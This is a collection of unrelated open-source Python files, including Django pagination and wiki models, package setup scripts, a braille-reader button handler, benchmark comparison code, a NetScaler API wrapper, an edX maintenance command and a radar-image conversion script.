pre_page= temp = '<a href="javascript:void(0)"> 上一页 </a>'
if self.current_page>=all_page:
next_page = '<a href="javascript:void(0)"> 下一页 </a>'
else:
next_page = '<a href="%s%d"> 下一页 </a>' % (base_url,self.current_page+1)
page_list.insert(0,pre_page)
page_list.append(next_page)
return "".join(page_list)
def user_list(request):
# for item in range(100):
# models.user_list.objects.create(username="user%d" % item ,age = item)
# print models.user_list.objects.all().count()
current_page =int(request.GET.get("page",1))
# start = (current_page-1)*10
# end = current_page*10
page_obj = Pager(current_page)
result = models.user_list.objects.all()[page_obj.start:page_obj.end]
all_item = models.user_list.objects.all().count()
page_str = page_obj.page_str(all_item,"/user_list/?page=")
return render(request,"user_list.html",{"result":result,"page_str":page_str}) |
thiagopa/thiagopagonha | wiki/models.py | Python | bsd-3-clause | 842 | 0.016687 | #-*- coding: utf-8 -*-
from django.db import models
from django.contrib import admin
from datetime import datetime, timedelta
import pytz
def default_now():
now = datetime.utcnow().replace(tzinfo=pytz.utc)
# Essa merda de UTC só funciona direito na versão 1.4 :(
# Era fazer essa gambi ou modificar o código do nonrel
now = now - timedelta(hours=3)
return now
class Page(models.Model):
name = models.CharField(max_length=60)
title = models.CharField(max_length=60)
data = models.TextField()
updated = models.DateTimeField()
def __unicode__(self):
return self.name
def save(self):
| self.updated = default_now()
su | per(Page, self).save()
class PageAdmin(admin.ModelAdmin):
exclude = ('updated',)
admin.site.register(Page,PageAdmin) |
libcrack/iker | setup.py | Python | gpl-3.0 | 2,536 | 0.001972 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: borja@libcrack.so
# Date: Wed Jan 28 16:35:57 CET 2015
import re
import os
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def read(relpath):
"""
Return string containing the contents of the file at *relpath* relative to
this file.
"""
cwd = os.path.dirname(__file__)
abspath = os.path.join(cwd,os.path.normpath(relpath))
with open(abspath) as f:
return f.read()
PACKAGE = os.path.basename(os.getcwd())
PACKAGES = [PACKAGE]
PROVIDES = [PACKAGE]
PACKAGE_DIR = {PACKAGE: PACKAGE}
SCRIPT_FILE = PACKAGE_DIR[PACKAGE] + '/__init__.py'
# SCRIPTS=['scripts/' + PACKAGE]
ENTRY_POINTS = {
# 'console_scripts': [PACKAGE + '=' + PACKAGE + '.' + PACKAGE + ':main'],
'console_scripts': ['{0}={0}.{0}:main'.format(PACKAGE)],
}
PLATFORMS = ['Linux']
KEYWORDS = 'ipsec ike'
INSTALL_REQUIRES = [
x.replace('-','_') for x in read('requirements.txt').split('\n') if x != ''
]
# x.replace('-','_') for x in read('requirements.txt').split('\n') if x != ''
main_py = open(SCRIPT_FILE).read()
metadata = dict(re.findall("__([a-z]+)__ = '([^']+)'", main_py))
docstrings = re.findall('"""(.*?)"""', main_py, re.DOTALL)
VERSION = metadata['version']
WEBSITE = metadata['website']
LICENSE = metadata['license']
AUTHOR_EMAIL = metadata['author']
AUTHOR, EMAIL = re.match(r'(.*) <(.*)>', AUTHOR_EMAIL).groups()
DESCRIPTION = docstrings[0].strip()
if '\n\n' in DESCRIPTION:
DESCRIPTION, LONG_DESCRIPTION = DESCRIPTION.split('\n\n', 1)
else:
LONG_DESCRIPTION = None
CLASSIFIERS = [
'Development Status :: 3 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: GPL',
'Operating System :: OS Independent',
'Operating System :: POSIX :: Linux',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
]
PARAMS = {
'platforms': PLATFORMS,
'name': PACKAGE,
'version': VERSION,
'description': DESCRIPTION,
'keywords': KEYWORDS,
| 'long_description': LONG_DESCRIPTION,
'author': AUTHOR,
'author_email': EMAIL,
'url': WEBSITE,
'license': LICENSE, |
'packages': PACKAGES,
'package_dir': PACKAGE_DIR,
#'scripts': SCRIPTS,
'entry_points': ENTRY_POINTS,
'provides': PROVIDES,
'requires': INSTALL_REQUIRES,
'install_requires': INSTALL_REQUIRES,
'classifiers': CLASSIFIERS,
}
setup(**PARAMS)
# vim:ts=4 sts=4 tw=79 expandtab:
|
google-research/prompt-tuning | prompt_tuning/train/__init__.py | Python | apache-2.0 | 572 | 0.001748 | # Copyright 2022 Google.
#
# Licensed under the Apache License, Version 2.0 (th | e "License");
# you may not use this file except in compliance with the | License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
|
Bristol-Braille/canute-ui | ui/buttons.py | Python | gpl-3.0 | 3,110 | 0 | import logging
from datetime import datetime
from .actions import actions
from .system_menu.system_menu import system_menu
from .library.buttons import library_buttons
from .book.buttons import book_buttons
from .go_to_page.buttons import go_to_page_buttons
from .bookmarks.buttons import bookmarks_buttons
from .language.buttons import language_buttons
log = logging.getLogger(__name__)
bindings = {
'library': library_buttons,
'book': book_buttons,
'go_to_page': go_to_page_buttons,
'bookmarks_menu': bookmarks_buttons,
'language': language_buttons,
'help_menu': {
'single': {
'L': actions.close_menu(),
'>': actions.next_page(),
'<': actions.previous_page(),
'R': actions.toggle_ | help_menu(),
},
'long': {
'L': actions.close_menu(),
'>': actions.next_page(),
'<': actions.previous_page(),
'R': actions.toggle_help_menu(),
'X': actions.reset_display('start'),
},
},
'system_menu': {
'single': {
'R': actions.toggle_help_menu(),
'>': actions.next_page | (),
'<': actions.previous_page(),
'L': actions.close_menu(),
},
'long': {
'R': actions.toggle_help_menu(),
'>': actions.next_page(),
'<': actions.previous_page(),
'L': actions.close_menu(),
'X': actions.reset_display('start'),
},
}
}
sys_menu = system_menu()
for i, item in enumerate(sys_menu):
action = sys_menu[item]
bindings['system_menu']['single'][str(i + 2)] = action
async def dispatch_button(key, press_type, state, dispatch):
if state['help_menu']['visible']:
location = 'help_menu'
else:
location = state['location']
try:
action = bindings[location][press_type][key]
except KeyError:
log.debug('no binding for key {}, {} press'.format(key, press_type))
else:
await dispatch(action)
prev_buttons = {}
long_buttons = {}
async def check(driver, state, dispatch):
# this is a hack for now until we change the protocol, we read the buttons
# twice so we don't miss the release of short presses
for _ in range(2):
buttons = driver.get_buttons()
for key in buttons:
up_or_down = buttons[key]
if up_or_down == 'down':
prev_buttons[key] = datetime.now()
elif up_or_down == 'up':
if key in long_buttons:
del long_buttons[key]
del prev_buttons[key]
else:
if key in prev_buttons:
del prev_buttons[key]
await dispatch_button(key, 'single', state, dispatch)
for key in prev_buttons:
diff = (datetime.now() - prev_buttons[key]).total_seconds()
if diff > 0.5:
prev_buttons[key] = datetime.now()
long_buttons[key] = True
await dispatch_button(key, 'long', state, dispatch)
|
renesugar/arrow | dev/archery/archery/benchmark/compare.py | Python | apache-2.0 | 3,878 | 0 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Define a global regression threshold as 5%. This is purely subjective and
# flawed. This does not track cumulative regression.
DEFAULT_THRESHOLD = 0.05
class BenchmarkComparator:
""" Compares two benchmarks.
Encodes the logic of comparing two benchmarks and taking a decision on
if it induce a regression.
"""
def __init__(self, contender, baseline, threshold=DEFAULT_THRESHOLD,
suite_name=None):
self.contender = contender
| self.baseline = baseline
self.threshold = threshold
self.suite_name = suite_name
@property
def name(self):
return self.baseline.name
@property
def less_is_better(self):
return self.ba | seline.less_is_better
@property
def unit(self):
return self.baseline.unit
@property
def change(self):
new = self.contender.value
old = self.baseline.value
if old == 0 and new == 0:
return 0.0
if old == 0:
return 0.0
return float(new - old) / abs(old)
@property
def confidence(self):
""" Indicate if a comparison of benchmarks should be trusted. """
return True
@property
def regression(self):
change = self.change
adjusted_change = change if self.less_is_better else -change
return (self.confidence and adjusted_change > self.threshold)
def compare(self, comparator=None):
return {
"benchmark": self.name,
"change": self.change,
"regression": self.regression,
"baseline": self.baseline.value,
"contender": self.contender.value,
"unit": self.unit,
"less_is_better": self.less_is_better,
}
def __call__(self, **kwargs):
return self.compare(**kwargs)
def pairwise_compare(contender, baseline):
dict_contender = {e.name: e for e in contender}
dict_baseline = {e.name: e for e in baseline}
for name in (dict_contender.keys() & dict_baseline.keys()):
yield name, (dict_contender[name], dict_baseline[name])
class RunnerComparator:
""" Compares suites/benchmarks from runners.
It is up to the caller that ensure that runners are compatible (both from
the same language implementation).
"""
def __init__(self, contender, baseline, threshold=DEFAULT_THRESHOLD):
self.contender = contender
self.baseline = baseline
self.threshold = threshold
@property
def comparisons(self):
contender = self.contender.suites
baseline = self.baseline.suites
suites = pairwise_compare(contender, baseline)
for suite_name, (suite_cont, suite_base) in suites:
benchmarks = pairwise_compare(
suite_cont.benchmarks, suite_base.benchmarks)
for _, (bench_cont, bench_base) in benchmarks:
yield BenchmarkComparator(bench_cont, bench_base,
threshold=self.threshold,
suite_name=suite_name)
|
mahabs/nitro | nssrc/com/citrix/netscaler/nitro/resource/config/appfw/appfwarchive.py | Python | apache-2.0 | 6,303 | 0.039029 | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class appfwarchive(base_resource) :
""" Configuration for archive resource. """
def __init__(self) :
self._name = ""
self._target = ""
self._src = ""
self._comment = ""
self._response = ""
@property
def name(self) :
"""Name of tar archive.<br/>Minimum length = 1<br/>Maximum length = 31.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
"""Name of tar archive.<br/>Minimum length = 1<br/>Maximum length = 31
"""
try :
self._name = name
except Exception as e:
raise e
@property
def target(self) :
"""Path to the file to be exported.<br/>Minimum length = 1<br/>Maximum length = 2047.
"""
try :
return self._target
except Exception as e:
raise e
@target.setter
def target(self, target) :
"""Path to the file to be exported.<br/>Minimum length = 1<br/>Maximum length = 2047
"""
try :
self._target = target
except Exception as e:
raise e
@property
def src(self) :
"""Indicates the source of the tar archive file as a URL
of the form
<protocol>://<host>[:<port>][/<path>]
<protocol> is http or https.
<host> is the DNS name or IP address of the http or https server.
<port> is the port number of the server. If omitted, the
default port for http or https will be used.
<path> is the path of the file on the server.
Import will fail if an https server requires client
certificate authentication.
.<br/>Minimum length = 1<br/>Maximum length = 2047.
"""
try :
return self._src
except Exception as e:
raise e
@src.setter
def src(self, src) :
"""Indicates the source of the tar archive file as a URL
of the form
<protocol>://<host>[:<port>][/<path>]
<protocol> is http or https.
<host> is the DNS name or IP address of the http or https server.
<port> is the port number of the server. If omitted, the
default port for http or https will be used.
<path> is the path of the file on the server.
Import will fail if an https server requires client
certificate authentication.
.<br/>Minimum length = 1<br/>Maximum length = 2047
"""
try :
self._src = src
except Exception as e:
raise e
@property
def comment(self) :
"""Comments associated with this archive.<br/>Maximum length = 128.
"""
try :
return self._comment
except Exception as e:
raise e
@comment.setter
def comment(self, comment) :
"""Comments associated with this archive.<br/>Maximum length = 128
"""
try :
self._comment = comment
except Exception as e:
raise e
@property
def response(self) :
try :
return self._response
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(appfwarchive_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.appfwarchive
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.name) :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def export(cls, client, resource) :
""" Use this API to export appfwarchive.
"""
try :
if type(resource) is not list :
exportresource = appfwarchive()
exportresource.name = resource.name
exportresource.target = resource.target
return exportresource.perform_operation(client,"export")
except Exception as e :
raise e
@classmethod
def Import(cls, client, resource) :
""" Use this API to Import appfwarchive.
"""
try :
if type(resource) is not list :
Importresource = appfwarchive()
Importresource.src = resource.src
Importresource.name = resource.name
Importresource.comment = resource.comment
return Importresource.perform_operation(client,"Import")
except Exception as e | :
raise e
@classmethod
def | delete(cls, client, resource) :
""" Use this API to delete appfwarchive.
"""
try :
if type(resource) is not list :
deleteresource = appfwarchive()
if type(resource) != type(deleteresource):
deleteresource.name = resource
else :
deleteresource.name = resource.name
return deleteresource.delete_resource(client)
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
""" Use this API to fetch all the appfwarchive resources that are configured on netscaler.
"""
try :
if not name :
obj = appfwarchive()
response = obj.get_resources(client, option_)
return response
except Exception as e :
raise e
class appfwarchive_response(base_response) :
def __init__(self, length=1) :
self.appfwarchive = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.appfwarchive = [appfwarchive() for _ in range(length)]
|
Bumpybox/pyblish-bumpybox | pyblish_bumpybox/plugins/nuke/validate_datatype.py | Python | lgpl-3.0 | 1,133 | 0 | from pyblish import api
from pyblish_bumpybox import inventory
class ValidateDatatype(api.InstancePlugin):
"""Validate output datatype matches with input."""
order = inventory.get_order(__file__, "ValidateDatatype")
families = ["write"]
label = "Datatype"
optional = True
targets = ["default", | "process"]
def process(self, instance):
# Only validate these channels
channels = [
"N_Object",
"N_World",
"P_Object",
"P_World",
"Pref",
"UV",
"velocity",
"cryptomatte"
| ]
valid_channels = []
for node_channel in instance[0].channels():
for channel in channels:
if node_channel.startswith(channel):
valid_channels.append(node_channel)
if valid_channels:
msg = (
"There are 32-bit channels: {0}.\n\nConsider changing the"
" output to 32-bit to preserve data.".format(valid_channels)
)
assert instance[0]["datatype"].value().startswith("32"), msg
|
beni55/edx-platform | lms/djangoapps/courseware/management/commands/remove_input_state.py | Python | agpl-3.0 | 6,715 | 0.004319 | '''
This is a one-off command aimed at fixing a temporary problem encountered where input_state was added to
the same dict object in capa problems, so was accumulating. The fix is simply to remove input_state entry
from state for all problems in the affected date range.
'''
import json
import logging
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from django.db import transaction
from courseware.models import StudentModule, StudentModuleHistory
LOG = logging.getLogger(__name__)
class Command(BaseCommand):
'''
The fix here is to remove the "input_state" entry in the StudentModule objects of any problems that
contain them. No problem is yet making use of this, and the code should do the right thing if it's
missing (by recreating an empty dict for its value).
To narrow down the set of problems that might need fixing, the StudentModule
objects to be checked is filtered down to those:
created < '2013-03-29 16:30:00' (the problem must have been answered before the buggy code was reverted,
on Prod and Edge)
modified > '2013-03-28 22:00:00' (the problem must have been visited after the bug was introduced
on Prod and Edge)
state like '%input_state%' (the problem must have "input_state" set).
This filtering is done on the production database replica, so that the larger select queries don't lock
the real production database. The list of id values for Student Modules is written to a file, and the
file is passed into this command. The sql file passed to mysql contains:
select sm.id from courseware_studentmodule sm
where sm.modified > "2013-03-28 22:00:00"
and sm.created < "2013-03-29 16:30:00"
and sm.state like "%input_state%"
and sm.module_type = 'problem';
'''
num_visited = 0
num_changed = 0
num_hist_visited = 0
num | _hist_changed = 0
option_list = BaseCommand.option_list + (
make_option('--save',
action='store_true',
des | t='save_changes',
default=False,
help='Persist the changes that were encountered. If not set, no changes are saved.'),
)
def fix_studentmodules_in_list(self, save_changes, idlist_path):
'''Read in the list of StudentModule objects that might need fixing, and then fix each one'''
# open file and read id values from it:
for line in open(idlist_path, 'r'):
student_module_id = line.strip()
# skip the header, if present:
if student_module_id == 'id':
continue
try:
module = StudentModule.objects.get(id=student_module_id)
except StudentModule.DoesNotExist:
LOG.error(u"Unable to find student module with id = %s: skipping... ", student_module_id)
continue
self.remove_studentmodule_input_state(module, save_changes)
hist_modules = StudentModuleHistory.objects.filter(student_module_id=student_module_id)
for hist_module in hist_modules:
self.remove_studentmodulehistory_input_state(hist_module, save_changes)
if self.num_visited % 1000 == 0:
LOG.info(" Progress: updated {0} of {1} student modules".format(self.num_changed, self.num_visited))
LOG.info(" Progress: updated {0} of {1} student history modules".format(self.num_hist_changed,
self.num_hist_visited))
@transaction.autocommit
def remove_studentmodule_input_state(self, module, save_changes):
''' Fix the grade assigned to a StudentModule'''
module_state = module.state
if module_state is None:
# not likely, since we filter on it. But in general...
LOG.info("No state found for {type} module {id} for student {student} in course {course_id}"
.format(type=module.module_type, id=module.module_state_key,
student=module.student.username, course_id=module.course_id))
return
state_dict = json.loads(module_state)
self.num_visited += 1
if 'input_state' not in state_dict:
pass
elif save_changes:
# make the change and persist
del state_dict['input_state']
module.state = json.dumps(state_dict)
module.save()
self.num_changed += 1
else:
# don't make the change, but increment the count indicating the change would be made
self.num_changed += 1
@transaction.autocommit
def remove_studentmodulehistory_input_state(self, module, save_changes):
''' Fix the grade assigned to a StudentModule'''
module_state = module.state
if module_state is None:
# not likely, since we filter on it. But in general...
LOG.info("No state found for {type} module {id} for student {student} in course {course_id}"
.format(type=module.module_type, id=module.module_state_key,
student=module.student.username, course_id=module.course_id))
return
state_dict = json.loads(module_state)
self.num_hist_visited += 1
if 'input_state' not in state_dict:
pass
elif save_changes:
# make the change and persist
del state_dict['input_state']
module.state = json.dumps(state_dict)
module.save()
self.num_hist_changed += 1
else:
# don't make the change, but increment the count indicating the change would be made
self.num_hist_changed += 1
def handle(self, *args, **options):
'''Handle management command request'''
if len(args) != 1:
raise CommandError("missing idlist file")
idlist_path = args[0]
save_changes = options['save_changes']
LOG.info("Starting run: reading from idlist file {0}; save_changes = {1}".format(idlist_path, save_changes))
self.fix_studentmodules_in_list(save_changes, idlist_path)
LOG.info("Finished run: updating {0} of {1} student modules".format(self.num_changed, self.num_visited))
LOG.info("Finished run: updating {0} of {1} student history modules".format(self.num_hist_changed,
self.num_hist_visited))
|
leandromet/Geoprocessamento---Geoprocessing | Palsar_HH_HV_to_RGB8bit.py | Python | mit | 4,323 | 0.018043 | """
#-------------------------------------------------------------------------------
# Name: ALOS HH, HV and RFDI on RGB 16signedint GEOTIFF
# Purpose: Calculates the RFDI , saves geotiff with HH, HV and RFDI layers
# in 8bit unsigned format, with values stretched for contrast enhancement.
# | Author: leandro.biondo@florestal.gov.br
#
# Created: 06/07/2015
# Copyright: (c) leandro.biondo 2015
# Licence: GPL
#-------------------------------------------------------------------------------
"""
import glob
| import gdal
from gdalconst import *
import osr
import numpy as np
from struct import *
import array
from scipy import ndimage
import math
import os
def exporta_alos_geoTIFF(arquivo, destino, refer):
pos = arquivo.find(refer)-1
lat = -1*int(arquivo[pos+6:pos+8])
lon = -1*int(arquivo[pos+9:pos+12])
f = open(arquivo, "rb")
print f
count = 0
print os.stat(arquivo).st_size
npa = np.fromfile(f, dtype=np.dtype('<H'))
f.close()
npa = npa.astype(np.float32)
npa = npa**2
npr = npa.reshape(4500,4500)
med9 = np.array([
[0.11,0.11,0.11],
[0.11,0.12,0.11],
[0.11,0.11,0.11],
])
#convolucao = ndimage.convolve(npr,med81)
#convolucao = ndimage.convolve(npr,med25)
convolucao = ndimage.convolve(npr,med9)
npalog = 10*np.log10(convolucao)-83
np.putmask(npalog, npalog<-500, -500)
npalog = npalog.reshape(4500,4500)
fv = open(arquivo.replace("HH","HV"), "rb")
print fv
count = 0
npav = np.fromfile(fv, dtype=np.dtype('<H'))
fv.close()
npav = npav.astype(np.float32)
npav = npav**2
nprv = npav.reshape(4500,4500)
#convolucao = ndimage.convolve(npr,med81)
#convolucao = ndimage.convolve(npr,med25)
convolucaov = ndimage.convolve(nprv,med9)
npalogv = 10*np.log10(convolucaov)-83
np.putmask(npalogv, npalogv<-500, -500)
npalogv = npalogv.reshape(4500,4500)
passer = True
rfdi = np.where ( passer, (1.*npalog - 1.*npalogv ) / ( 1.*npalog + 1.*npalogv ), -999 )
format = "GTiff"
driver = gdal.GetDriverByName( format )
metadata = driver.GetMetadata()
if metadata.has_key(gdal.DCAP_CREATE) \
and metadata[gdal.DCAP_CREATE] == 'YES':
print 'Driver %s supports Create() method.' % format
if metadata.has_key(gdal.DCAP_CREATECOPY) \
and metadata[gdal.DCAP_CREATECOPY] == 'YES':
print 'Driver %s supports CreateCopy() method.' % format
dst_ds = driver.Create( destino, 4500, 4500, 3, gdal.GDT_Byte, ['COMPRESS=LZW'] )
dst_ds.SetMetadataItem("DateTime", "2009:00:00")
dst_ds.SetGeoTransform( [ lon-0.000111111, 0.000222222, 0, lat-0.000111111, 0, -0.000222222 ] )
srs = osr.SpatialReference()
srs.SetWellKnownGeogCS( 'WGS84' )
dst_ds.SetProjection( srs.ExportToWkt() )
print "min", np.amin(npalog)
print np.amin(npalogv)
print np.amin(rfdi)
print "max", np.amax(npalog)
print np.amax(npalogv)
print np.amax(rfdi)
#new range
npalog=npalog+np.abs(np.amin(npalog))
npalogv=npalogv+np.abs(np.amin(npalogv))
rfdi=rfdi+np.abs(np.amin(rfdi))
npalog=(npalog-np.amin(npalog))*(255/((np.amax(npalog)-np.amin(npalog))))
npalogv=(npalogv-np.amin(npalogv))*(255/((np.amax(npalogv)-np.amin(npalogv))))
rfdi=(rfdi-np.amin(rfdi))*(255/((np.amax(rfdi)-np.amin(rfdi))))
print "minpos", np.amin(npalog)
print np.amin(npalogv)
print np.amin(rfdi)
print "maxpos", np.amax(npalog)
print np.amax(npalogv)
print np.amax(rfdi)
print "meanpos", np.mean(npalog, dtype=np.float64)
print np.mean(npalogv, dtype=np.float64)
print np.mean(rfdi, dtype=np.float64)
dst_ds.GetRasterBand(1).WriteArray(npalog.astype(int))
dst_ds.GetRasterBand(2).WriteArray(npalogv.astype(int))
dst_ds.GetRasterBand(3).WriteArray(rfdi.astype(int))
# Once we're done, close properly the dataset
dst_ds = None
print "Gerada imagem %s" %destino
c=0
for files in glob.glob("C:\\Biondo\\PALSAR_Catalogo\\2009\\RGB\\*sl_HH"):
entrada = files
saida = files+"_img.tif"
referencia = "RGB"
print entrada, ">>>",saida
exporta_alos_geoTIFF(entrada,saida,referencia)
c+=1
print c
#if c >= 1:
# break
print "end"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.